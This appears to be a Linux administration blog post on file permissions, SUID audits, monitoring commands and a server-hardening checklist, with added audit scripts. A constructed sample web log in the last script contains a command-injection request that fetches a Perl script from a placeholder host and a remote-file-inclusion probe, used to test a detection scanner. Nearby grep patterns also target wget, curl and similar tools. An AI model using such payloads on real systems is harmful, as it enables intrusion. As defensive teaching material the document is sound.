Wednesday, 26 May 2010

Linux File And Directory Permissions

Never make files world-writable. To search for world-writable files under the current directory:
find . -perm -2 -print
Find directories with exactly 777 permissions:
find . -type d -perm 777
Search for SUID and SGID files ("-perm /6000" means "any of these bits set"; the older "-perm +6000" spelling found in many guides is rejected by current GNU find):
find / -type f -perm /6000 -ls
Search the /dev directory for world-writable files:
find /dev -perm -2 -print
Find all files owned by a particular user (here nobody is the username):
find / -user nobody -ls
To locate all world-writable files on your system, use the following command:
root# find / -perm -2 ! -type l -ls
In the normal course of operation several files will be world-writable, including some device nodes in /dev, and every symbolic link shows mode 777 (its permission bits are never consulted), which is why "! -type l" excludes links from the listing. Adding -xdev keeps the search on one filesystem, so /proc and network mounts are skipped.
SUID commands
The SUID mechanism allows ordinary users to run a program with the rights of the file's owner for as long as that program runs.
For example, a user can change their own password with the passwd command, which writes to /etc/passwd (and, on current systems, to /etc/shadow), both owned by root: /bin/passwd is executable by anybody but is SUID root, so while it runs the real user ID (the user who ran the command) differs from the effective user ID (root) that is needed to write those files.
SUID is indicated by an 's' in place of 'x' in the owner-execute position: -rwsr-xr-x. A capital 'S' there means the SUID bit is set but the owner has no execute permission, which is almost always a mistake.
In octal notation a SUID program is indicated by 04???.
SGID is similar for the group permissions: 02???. Every SUID-root binary is a privilege boundary, so the list produced by the find command above should be short, known, and unchanged between audits.
Setting permissions correctly.
You can use these commands to set 755 on directories and 644 on files under the current directory. Run them only in the tree you mean to reset (a web document root, for example): 644 removes the execute bit from every file, so applied to /usr or /bin it would make scripts and binaries unrunnable; applied to a web root it also clears any SUID bits the audit above may have found.
find . -type f -exec chmod 644 {} \;
find . -type d -exec chmod 755 {} \;
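The checks above combine naturally into one audit script. The following is an added example, not code from the original post: it wraps the find expressions as shell functions and exercises them on a throw-away directory tree that it constructs itself (the file names dropbox, helper, sgid and link are invented for the demonstration; the symlink is there to show why "! -type l" matters). To audit a real machine, call the functions with / instead of the generated tree.

```shell
#!/bin/sh
# Added example (not from the original post): the find expressions from the
# permissions section wrapped as functions, exercised on a constructed tree.

# Files or directories writable by "other"; symbolic links excluded because
# their mode is always 0777 and is never consulted.
world_writable() {
    find "$1" -xdev -perm -0002 ! -type l -print 2>/dev/null | sort
}

# Directories with exactly 0777 permissions.
dirs_777() {
    find "$1" -xdev -type d -perm 0777 -print 2>/dev/null | sort
}

# Regular files with the setuid or setgid bit. "/6000" means "any of these
# bits"; it replaces the old "+6000" spelling that current GNU find rejects.
setuid_setgid() {
    find "$1" -xdev -type f -perm /6000 -print 2>/dev/null | sort
}

# Constructed sample tree (hypothetical names): one problem of each kind plus
# a symlink decoy. Prints the root of the tree.
make_sample_tree() {
    root=$(mktemp -d) || exit 1
    mkdir "$root/ok" "$root/dropbox"
    chmod 0755 "$root/ok"
    chmod 0777 "$root/dropbox"                   # 777 directory, world-writable
    printf 'x\n' > "$root/ok/readme"; chmod 0644 "$root/ok/readme"
    printf 'x\n' > "$root/ok/shared"; chmod 0666 "$root/ok/shared"   # world-writable file
    printf 'x\n' > "$root/ok/helper"; chmod 4755 "$root/ok/helper"   # setuid
    printf 'x\n' > "$root/ok/sgid";   chmod 2755 "$root/ok/sgid"     # setgid
    ln -s /etc/passwd "$root/ok/link"            # symlink: mode 777, must not be reported
    echo "$root"
}

# "<world-writable> <777 dirs> <setuid/setgid>" counts for a tree.
count_findings() {
    printf '%s %s %s\n' \
        "$(world_writable "$1" | wc -l | tr -d ' ')" \
        "$(dirs_777 "$1" | wc -l | tr -d ' ')" \
        "$(setuid_setgid "$1" | wc -l | tr -d ' ')"
}

# Stand-alone run ("sh audit.sh --demo"): report on the sample tree, then clean up.
if [ "${1:-}" = "--demo" ]; then
    tree=$(make_sample_tree)
    echo "world-writable:";  world_writable "$tree"
    echo "777 directories:"; dirs_777 "$tree"
    echo "setuid/setgid:";   setuid_setgid "$tree"
    rm -rf "$tree"
fi
```

On the sample tree the report lists the 0777 directory and the 0666 file as world-writable, the directory again under 777, and the two setuid/setgid files; the symlink never appears.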

Linux Commands New

Linux Commands
Backup to tape drive /dev/st0
The following command backs up the /webroot directory and its content to /dev/st0 with a blocking factor of 256. The f option must be followed directly by the device name, so "tar cvf -b 256 /dev/st0 ..." (a common typo) would try to write the archive to a file named "-b"; the correct form is:
# tar -cvf /dev/st0 -b 256 /webroot
-b, --blocking-factor N
use record size of Nx512 bytes (default N=20), so -b 256 writes 128 KiB records
Using cdrecord
  1. cdrecord -scanbus
  2. cdrecord -v speed=2 dev=0,0,0 -data cdimage.iso (The CD writer is the device labeled '0,0,0')
Making ISO images
mkisofs -r -o output_cd_image data_on_HDD (then use cdrecord to write output_cd_image to a CD)
Finding out the disk usage for a partition or directory: du - estimate file space usage. Note that -h (human-readable) and -m (megabytes) are alternatives and the last one given wins, so pick one:
du -h --max-depth=1
How to monitor the processes that are using up the most CPU and memory on a server.
ps auxfw|sort -nr|grep -v 0.0
This keeps the ps tree output and drops every line containing "0.0" (processes idle in both %CPU and %MEM), but note that sort -nr sorts on the first column, USER, which is not numeric, so the order is not a ranking. For an actual ranking use the procps sort key: ps aux --sort=-%cpu | head (or --sort=-%mem).


  [root@wordsworth ~]# ps auxfw|sort -nr|grep -v 0.0
  USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
  linux      613  0.4  3.2 21844 15896 ?       S    15:01   0:10 wish /usr/bin/amsn
  linux     4085  0.1  1.7 28384 8240 ?        S    Mar01  13:45 /usr/libexec/wnck-applet --oaf-
  linux    32728  1.8  7.5 67216 36196 ?       S    14:54   0:50 /usr/lib/opera/9.10-20061214.5/
  linux    31458  0.1  1.0 48068 5088 ?        Sl   12:26   0:15 xmms -e
  linux    30276  0.6  4.4 79656 21488 ?       Sl   07:55   3:09 skype
  linux    30261  3.0 18.8 221380 90792 ?      Sl   07:54  14:15      \_ /home/linux/firefox/firefox-
  linux    30099  0.1  4.5 123240 21776 ?      Sl   07:25   0:54      \_ /usr/lib/
  linux     2285  0.1  2.6 35504 12560 ?       S    Mar06   3:06 gaim

   root@server16 [~]# ps auxfw|grep -vE '0.0|0.1'

How to verify the integrity of the password files
We can use the command below to verify the integrity of the password file; pwck checks that each entry has the right number of fields, a unique name, valid UID and group, and an existing home directory and shell (missing home directories for system accounts, as below, are normal):
shibu@shibu-laptop:~$ apropos pwck
pwck (8)- verify integrity of password files
shibu@shibu-laptop:~$ sudo pwck /etc/passwd
[sudo] password for shibu:
user lp: directory /var/spool/lpd does not exist
user news: directory /var/spool/news does not exist
user uucp: directory /var/spool/uucp does not exist
user www-data: directory /var/www does not exist
user list: directory /var/list does not exist
user irc: directory /var/run/ircd does not exist
user gnats: directory /var/lib/gnats does not exist
user nobody: directory /nonexistent does not exist
user dhcp: directory /nonexistent does not exist
user syslog: directory /home/syslog does not exist
user klog: directory /home/klog does not exist
user hplip: directory /var/run/hplip does not exist
user haldaemon: directory /home/haldaemon does not exist
pwck: no changes
shibu@shibu-laptop:~$ 

How to verify the integrity of the group file
shibu@shibu-laptop:~$ apropos grpck
grpck (8)- verify integrity of group files
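pwck and grpck check structure, not intent: a second UID-0 account or an empty password field are both perfectly well-formed entries. The script below is an added example, not from the original post, that looks for exactly those conditions on a constructed /etc/passwd and /etc/shadow pair (the accounts, hashes and paths are made up for the demonstration); run the same functions against the real files as root, since /etc/shadow is readable only by root.

```shell
#!/bin/sh
# Added example (not from the original post): account checks that pwck and
# grpck do not perform, run against a constructed /etc/passwd and /etc/shadow
# pair. Point the functions at the real files (as root) to audit a machine.

# Every account whose UID is 0. Only "root" is expected; anything else is a
# second superuser, a classic backdoor.
passwd_uid0() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Login names that occur more than once (lookups use the first entry, so a
# duplicate can carry a different UID or shell unnoticed).
passwd_dupes() {
    cut -d: -f1 "$1" | sort | uniq -d
}

# Accounts whose shadow password field is empty: login with no password.
shadow_nopass() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Accounts in passwd with no matching shadow line. Usage: fn PASSWD SHADOW.
passwd_without_shadow() {
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print $1 }' "$2" "$1"
}

# "<extra UID-0> <duplicates> <no-password> <no-shadow-entry>" counts.
account_summary() {
    printf '%s %s %s %s\n' \
        "$(passwd_uid0 "$1" | grep -vc '^root$')" \
        "$(passwd_dupes "$1" | wc -l | tr -d ' ')" \
        "$(shadow_nopass "$2" | wc -l | tr -d ' ')" \
        "$(passwd_without_shadow "$1" "$2" | wc -l | tr -d ' ')"
}

# Constructed sample files (hypothetical accounts, fake hashes); prints the
# two paths separated by a space.
make_sample_files() {
    p=$(mktemp); s=$(mktemp)
    cat > "$p" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
toor:x:0:0:second superuser:/root:/bin/bash
www:x:48:48:apache:/var/www:/sbin/nologin
www:x:1001:1001:duplicate name:/home/www:/bin/bash
guest:x:1002:1002::/home/guest:/bin/bash
nobody:x:99:99:nobody:/:/sbin/nologin
EOF
    cat > "$s" <<'EOF'
root:$6$saltsalt$fakehash:18000:0:99999:7:::
bin:*:18000:0:99999:7:::
toor:$6$saltsalt$fakehash:18000:0:99999:7:::
www:!!:18000:0:99999:7:::
guest::18000:0:99999:7:::
EOF
    echo "$p $s"
}
```

Against the sample pair the summary is "1 1 1 1": toor as the extra UID-0 account, www duplicated, guest with an empty password, and nobody without a shadow entry.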

How to check information regarding LVM
The commands below are listed in the order they are used when bringing a new disk into LVM (section numbers are from the manual pages):
  • pvcreate (8) - initialize a disk or partition for use by LVM: pvcreate /dev/sdb1
  • pvdisplay (8) - display attributes of a physical volume: pvdisplay
  • vgcreate (8) - create a volume group: vgcreate mynew_vg /dev/sdb1, or vgcreate mynew_vg /dev/sdb1 /dev/sdb2
  • vgextend (8) - add physical volumes to a volume group: vgextend mynew_vg /dev/sdb2
  • vgdisplay (8) - display attributes of volume groups
  • lvcreate (8) - create a logical volume in an existing volume group; -L takes a size whose default unit is megabytes:
      create a logical volume of 400 MB: lvcreate -L 400 -n vol01 mynew_vg
      create a logical volume of 4 GB: lvcreate -L 4G -n vol02 mynew_vg (note that -L 4000 would mean 4000 MB)
  • mke2fs [mkfs] (8) - create an ext2/ext3 filesystem: mkfs.ext3 /dev/mynew_vg/vol01
  • resize2fs (8) - ext2/ext3 file system resizer, used after the logical volume has been grown with lvextend: resize2fs /dev/mynew_vg/vol01

How to find processor related stats
mpstat
[linux@wordsworth ~]$ man -k mpstat
  mpstat               (1)  - Report processors related statistics
  snmpstatus           (1)  - Retrieves important information from a network entity
  [linux@wordsworth ~]$

  [linux@wordsworth ~]$ mpstat 5
  Linux 2.6.9-55.0.2.ELsmp (wordsworth.armialocal.com)    08/12/2007

  09:59:51 PM  CPU   %user   %nice %system %iowait    %irq   %soft   %idle    intr/s
  09:59:56 PM  all   18.70    0.10   42.50    0.00    0.10    0.00   38.60   1290.60
  10:00:01 PM  all   15.30    0.00   41.80    0.00    0.10    0.00   42.80   1276.00
  10:00:06 PM  all   19.98    0.00   42.36    0.20    0.00    0.00   37.46   1273.35
vmstat
[linux@wordsworth ~]$ man -k vmstat
   vmstat               (8)  - Report virtual memory statistics
   [linux@wordsworth ~]$

   [linux@wordsworth ~]$ vmstat 2
   procs -----------memory---------- ---swap-- -----io---- --system-- ----cpu----
    r  b   swpd   free   buff  cache   si   so    bi    bo   in    cs us sy id wa
    2  0 355084  20888  10736  84396    1    1    37    29   11    13 10 22 67  1
    1  0 355084  20936  10736  84396    0    0     0     0 1284  1191 10 42 48  0
    3  0 355084  19848  10736  84396    0    0     0     0 1246  1123  9 44 47  0

How do I display info regarding all TCP/IP sockets currently in operation?
Use the command netstat. "netstat -a" lists every socket; add -l to see only listening sockets, -n to skip name resolution, -p to show the owning PID/program, and -t or -u to restrict the listing to TCP or UDP. The usage summary and option list:

       netstat -a
       usage: netstat [-veenNcCF] [<Af>] -r         netstat {-V|--version|-h|--help}
       netstat [-vnNcaeol] [<Socket> ...]
       netstat { [-veenNac] -i | [-cnNe] -M | -s }

        -r, --route              display routing table
        -i, --interfaces         display interface table
        -g, --groups             display multicast group memberships
        -s, --statistics         display networking statistics (like SNMP)
        -M, --masquerade         display masqueraded connections

        -v, --verbose            be verbose
        -n, --numeric            don't resolve names
        --numeric-hosts          don't resolve host names
        --numeric-ports          don't resolve port names
        --numeric-users          don't resolve user names
        -N, --symbolic           resolve hardware names
        -e, --extend             display other/more information
        -p, --programs           display PID/Program name for sockets
        -c, --continuous         continuous listing

        -l, --listening          display listening server sockets
        -a, --all, --listening   display all sockets (default: connected)
        -o, --timers             display timers
        -F, --fib                display Forwarding Information Base (default)
        -C, --cache              display routing cache instead of FIB

How to Secure a Linux Server Centos

How to Secure a Linux Server.
1. Kernel recompile with grsecurity
2. firewall = CSF
3. Stop unnecessary processes
4. Install Logcheck
5. Install Logwatch
Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104
To modify Logwatch, SSH into the server and log in as root. At the command prompt type: pico -w /etc/log.d/conf/logwatch.conf
Scroll down to
MailTo = root
and change it to
MailTo = your@email.com
Note: Set the e-mail address to an offsite account in case you get hacked; a report that stays on the compromised box can be edited or deleted by the intruder.
Now scroll down to
Detail = Low
Change that to Med or High, or use the numeric scale (0 to 10):
Detail = 5 or Detail = 10
Note: High will give you more detailed logs with all actions. Save and exit.
6. If cpanel server then WHM configuration check
7. OpenSSH configuration check
8. Switch from proftpd to pure-ftpd
9. Rootkit Hunter
rkhunter:

1. Login to your server via SSH as root. Then Type: cd /usr/local/src/
2. Download RKHunter Version 1.1.4
3. Extract files
Type: tar -xzvf rkhunter-1.1.4.tar.gz
4. Type: cd rkhunter
5. Type: ./installer.sh
6. Lets setup RKHunter to e-mail you you daily scan reports.
Type: pico -w /etc/cron.daily/rkhunter.sh
Add the following:
#!/bin/bash
(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)
Replace the e-mail above with your e-mail!!
It is best to send the e-mail to an e-mail off-site so that
if the box IS compromised the hacker can't erase the scan report unless he hacks another server too.
Type: chmod +x /etc/cron.daily/rkhunter.sh
10. Chkrootkit
Installing chkrootkit

[root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# ./chkrootkit*/chkrootkit
11. mod_security
12. mod_evasive
13. Host spoof protection
14. Operating System check
15. Name server configuration check
16. Disk check
17. Kernel check
18. Apache tune and check
19. MySQL tune and check
20. Enhanced log rotation
21. Day of the week backup rotations
22. Secure /tmp /var/tmp /dev/shm
23. Libsafe for 2.4 kernels
24. Exploit check
25. Delete unnecessary OS users
26. Disable open DNS recursion
27. Enhanced path protection
28. Remove SUID/GUID from binaries
29. PHP hardening
30. phpsuexec
31. Disable vulnerable phpBB installs
32. Initial cPanel configuration
33. Check iptables is configured
34. Check incoming MySQL port
35. Check /etc/cron.daily/logrotate
36. Check /etc/resolv.conf for localhost entry
37. Check /etc/named.conf for recursion restrictions
38. Check server runlevel
39. Check nobody cron
40. Check Operating System support
41. Check SSHv1 is disabled
42. Check SSH on non-standard port
43. Check SSH PasswordAuthentication
44. Check telnet port 23 is not in use
45. Check shell limits
46. Check Background Process Killer
47. Check root forwarder
48. Check exim for extended logging
49. Check php for enable_dl = Off
50. Check php for disable_functions=
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
(allow_url_fopen, often seen in this list, is an ini directive rather than a function, so it belongs on its own line: allow_url_fopen = Off)
51. Check php for register_globals = Off
52. Check php open_basedir protection
53. Check phpsuexec
54. Check cPanel login is SSL only
55. Check boxtrapper is disabled
56. Check max emails per hour is set
57. Check whether users can reset passwords via email
58. Check whether native cPanel SSL is enabled
59. Check compilers
60. Check Anonymous FTP access
61. Check allow remote domains
62. Check block common domains
63. Check allow park domains
64. Check package updates
65. Check security updates
66. Check melange chat server

67. service cups stop; chkconfig cups off
68. service xfs stop; chkconfig xfs off
69. service atd stop; chkconfig atd off
70. service nfslock stop; chkconfig nfslock off
71. service canna stop; chkconfig canna off
72. service FreeWnn stop; chkconfig FreeWnn off
73. service cups-config-daemon stop; chkconfig cups-config-daemon off
74. service iiim stop; chkconfig iiim off
75. service mDNSResponder stop; chkconfig mDNSResponder off
76. service nifd stop; chkconfig nifd off
77. service rpcidmapd stop; chkconfig rpcidmapd off
78. service bluetooth stop; chkconfig bluetooth off
79. service anacron stop; chkconfig anacron off
80. service gpm stop; chkconfig gpm off
81. service saslauthd stop; chkconfig saslauthd off
82. service avahi-daemon stop; chkconfig avahi-daemon off
83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off
84. service hidd stop; chkconfig hidd off
85. service pcscd stop; chkconfig pcscd off
86. service sbadm stop; chkconfig sbadm off
87. service webmin stop; chkconfig webmin off
88. Add a load alert script run from a 1-minute cron entry (* * * * * /root/loadalert.sh):
#!/bin/bash
# uptime alert script: mail when the 1-minute load average exceeds 4
UP=$(uptime | awk '{print $(NF-2)}' | cut -d. -f1)
if [ "$UP" -gt 4 ]
then
    uptime | mail -s "**SERVER LOAD is $UP" mailadd@mail.com
fi
89. Ignore ping:
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
Drop only echo-request rather than all of ICMP ("-p icmp -j DROP"): discarding every ICMP type also blocks the "fragmentation needed" messages that path MTU discovery relies on, which breaks connections to some networks.
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
(mind the space after the 1: "echo 1>/proc/..." is parsed as a redirection of file descriptor 1 and writes an empty line instead of the value)
vi /etc/sysctl.conf
Append the following line so the setting survives a reboot, then run sysctl -p:
net.ipv4.icmp_echo_ignore_all = 1
90. Find directory with 777 permission.
find . -type d -perm 777
91. Check for open ports using the nmap command.
92. Disable identification output for Apache
To disable the version output for Apache, SSH into the server and log in as root.
At the command prompt type: pico /etc/httpd/conf/httpd.conf
Scroll (way) down and change the following line to
ServerSignature Off
and also set ServerTokens Prod, which reduces the Server response header to "Apache" with no version, OS or module details.
Restart Apache
At the command prompt type: /etc/rc.d/init.d/httpd restart
93.Change ssh ListenAddress /etc/ssh/sshd_config
94.PermitRootLogin no
95. Add a root login alert
vi /root/.bash_profile and append this single line (the host comes from the last field of "who am i", the current session; for a local console login there is no host and the subject shows the login time instead):
echo 'ALERT - Root Shell Access on:' "$(date)" "$(who am i)" | mail -s "Alert: Root Access from $(who am i | awk '{print $NF}')" your@email.com
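Items 41 to 43 and 93 to 94 are all sshd_config settings, and the detail that bites in practice is that sshd honours the first value it finds for a keyword, so appending PermitRootLogin no below an existing PermitRootLogin yes changes nothing. The checker below is an added example, not from the original post: it reads a config the way sshd does (Match blocks excluded, an assumption made to keep it short) and reports on two constructed configs, one deceptively hardened and one that passes.

```shell
#!/bin/sh
# Added example (not from the original post): audit an sshd_config for the
# items in the checklist above (SSHv1 disabled, non-standard port, explicit
# ListenAddress, PermitRootLogin no, PasswordAuthentication no).
# sshd uses the FIRST value it reads for each keyword, so a hardened line
# appended below an earlier permissive one is silently ignored; this checker
# applies the same rule. Keywords inside Match blocks are not modelled
# (an assumption that keeps the example short).

# First effective value of a keyword (case-insensitive); empty if unset.
sshd_value() {
    awk -v key="$2" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }            # comments and blank lines
        tolower($1) == "match" { exit }              # stop at the first Match block
        tolower($1) == tolower(key) { print $2; exit }
    ' "$1"
}

# Prints one FAIL:/WARN: line per problem; the exit status is the number of
# FAIL lines, so 0 means every hard requirement is met.
audit_sshd() {
    cfg=$1; fails=0
    v=$(sshd_value "$cfg" Protocol)
    case "$v" in
        ""|2) ;;                                     # unset on current OpenSSH means v2 only
        *) echo "FAIL: Protocol is '$v'; SSHv1 must be disabled"; fails=$((fails+1)) ;;
    esac
    v=$(sshd_value "$cfg" PermitRootLogin)
    [ "$v" = no ] || { echo "FAIL: PermitRootLogin is '${v:-unset}', want no"; fails=$((fails+1)); }
    v=$(sshd_value "$cfg" PasswordAuthentication)
    [ "$v" = no ] || { echo "FAIL: PasswordAuthentication is '${v:-unset (default yes)}', want no"; fails=$((fails+1)); }
    v=$(sshd_value "$cfg" Port)
    case "$v" in
        ""|22) echo "WARN: sshd listens on port 22; the checklist asks for a non-standard port" ;;
    esac
    [ -n "$(sshd_value "$cfg" ListenAddress)" ] || echo "WARN: no ListenAddress; sshd binds every interface"
    return "$fails"
}

# Constructed sample that looks hardened at the bottom; the first values win.
write_weak_config() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# sshd_config (constructed for this example)
Protocol 2,1
#PermitRootLogin no
PermitRootLogin yes
PasswordAuthentication yes
# "hardening" appended later, ignored by sshd because the earlier lines win:
PermitRootLogin no
PasswordAuthentication no
EOF
    echo "$f"
}

# Constructed sample that passes. Its Match block re-enables password
# authentication for one user, which is outside what this checker models.
write_hardened_config() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Port 2222
ListenAddress 192.0.2.10
Protocol 2
PermitRootLogin no
PasswordAuthentication no
Match User backup
    PasswordAuthentication yes
EOF
    echo "$f"
}
```

Running audit_sshd on the weak config yields three FAIL lines (Protocol, PermitRootLogin, PasswordAuthentication) plus two WARN lines and exits with status 3; the hardened config produces no output and exits 0. To check a live host, run audit_sshd /etc/ssh/sshd_config and, after any change, sshd -t before restarting.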
96.Set an SSH Legal Message in /etc/motd
97. Locate. Run updatedb first, since locate only searches its database, then look for the usual IRC bots, bouncers, web shells and trust files:
locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts
98. Perform some UDP and TCP scans from outside the host.
This site is not bad either: https://grc.com/x/ne.dll?bh0bkyd2
99.Check /var/log/secure , /var/log/messages and other log files of services running to see if there are any issues.
100.Check your box to see if your performance has degraded or if your machine is being over used.
For that, use the commands
vmstat
Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)
mpstat
Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)
iostat
This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)
sar
Displays overall system performance.
Check to see if your server has any hidden processes running.
ps
Displays the status of all known processes.
lsof
Lists all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.
101. Restrict the init scripts to root: chmod -R 700 /etc/rc.d/init.d/*
    * Use rpm -Va to find out whether any packaged file has been modified (it compares size, mode, checksum and owner against the rpm database, so a rootkit that also patches the database can defeat it)
    * Apply security patches to vulnerable software (ie. patch -p1 < patch file)
    * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
    * Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (nagios or big brother)
102. Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire: http://www.cs.tut.fi/~rammer/aide.html
103. Testing phase when in production.
Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.
Grep the Apache domain logs for requests that carry shell commands:
find /usr/local/apache/domlogs -type f -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)' {} \;
Expect noise from this pattern: the unanchored "sh" and "cd" alternatives also match inside ordinary words ("Macintosh" in a browser user-agent string, or a /cdn/ path), so review the hits rather than alerting on them directly.
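The domlogs grep above is the right idea but the pattern is noisy. The script below is an added example, not from the original post: it URL-decodes the request target from each combined-format log line and matches the same command names as whole tokens, and additionally flags a remote URL supplied as a query parameter (a file-inclusion probe). The log lines it runs on are constructed for the demonstration (addresses from the documentation ranges, invented requests); point scan_access_log at the real domlogs files to use it.

```shell
#!/bin/sh
# Added example (not from the original post): a tighter version of the
# domlogs grep above. It URL-decodes the request target from each combined
# log line and matches command names as whole tokens, so "cdn", "Macintosh"
# or "header.sh.png" are not reported, while "cmd=cd%20/tmp;wget%20..." is.
# Remote URLs passed in a query parameter are also flagged.
# Usage: scan_access_log /usr/local/apache/domlogs/*

scan_access_log() {
    awk -v cmds="wget curl lynx gcc perl sh bash cd mkdir touch chmod" '
    BEGIN {
        n = split(cmds, a, " ")
        for (i = 1; i <= n; i++) want[a[i]] = 1
        for (i = 32; i <= 126; i++) hex[sprintf("%02x", i)] = sprintf("%c", i)
    }
    # Decode %XX (printable ASCII only) and "+" in a URL component.
    function urldecode(s,    out, c, h) {
        out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            h = tolower(substr(s, 2, 2))
            if (c == "%" && (h in hex)) { out = out hex[h]; s = substr(s, 4) }
            else if (c == "+")          { out = out " ";    s = substr(s, 2) }
            else                        { out = out c;      s = substr(s, 2) }
        }
        return out
    }
    {
        # Combined log format: the request line is the first quoted field.
        if (split($0, q, "\"") < 3) next
        split(q[2], r, " ")                  # method, target, protocol
        target = urldecode(r[2])
        hit = ""
        # Split on shell metacharacters and query separators, not on "/" or ".",
        # so path components such as /cdn/ or header.sh.png stay intact.
        m = split(target, tok, /[ \t;|&`$()<>?=]+/)
        for (i = 1; i <= m && hit == ""; i++)
            if (tolower(tok[i]) in want) hit = "command " tok[i]
        if (hit == "" && target ~ /=(https?|ftp):\/\//) hit = "remote URL in parameter"
        if (hit != "") print FILENAME ":" FNR ": " hit ": " target
    }' "$@"
}

# Number of flagged lines in one log file.
count_hits() {
    scan_access_log "$1" | wc -l | tr -d ' '
}

# Constructed sample log (documentation-range addresses, made-up requests):
# lines 3 and 4 are attacks, the others are benign look-alikes.
write_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
198.51.100.7 - - [26/May/2010:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh)"
198.51.100.7 - - [26/May/2010:10:12:02 +0000] "GET /images/cdn/header.sh.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [26/May/2010:10:13:40 +0000] "GET /cgi-bin/test.cgi?cmd=cd%20/tmp;wget%20http://203.0.113.1/x.pl HTTP/1.0" 200 31 "-" "libwww-perl/5.8"
198.51.100.9 - - [26/May/2010:10:13:41 +0000] "GET /index.php?page=http://203.0.113.1/shell.txt? HTTP/1.0" 200 31 "-" "libwww-perl/5.8"
198.51.100.9 - - [26/May/2010:10:13:42 +0000] "POST /upload.php HTTP/1.1" 200 20 "-" "curl/7.19"
EOF
    echo "$f"
}
```

On the sample file only lines 3 ("command cd") and 4 ("remote URL in parameter") are reported; the user-agent strings are deliberately not inspected, which is why "curl/7.19" on line 5 does not fire. The decoder only handles printable ASCII escapes, so double-encoded or UTF-8 payloads need a second decoding pass before this check.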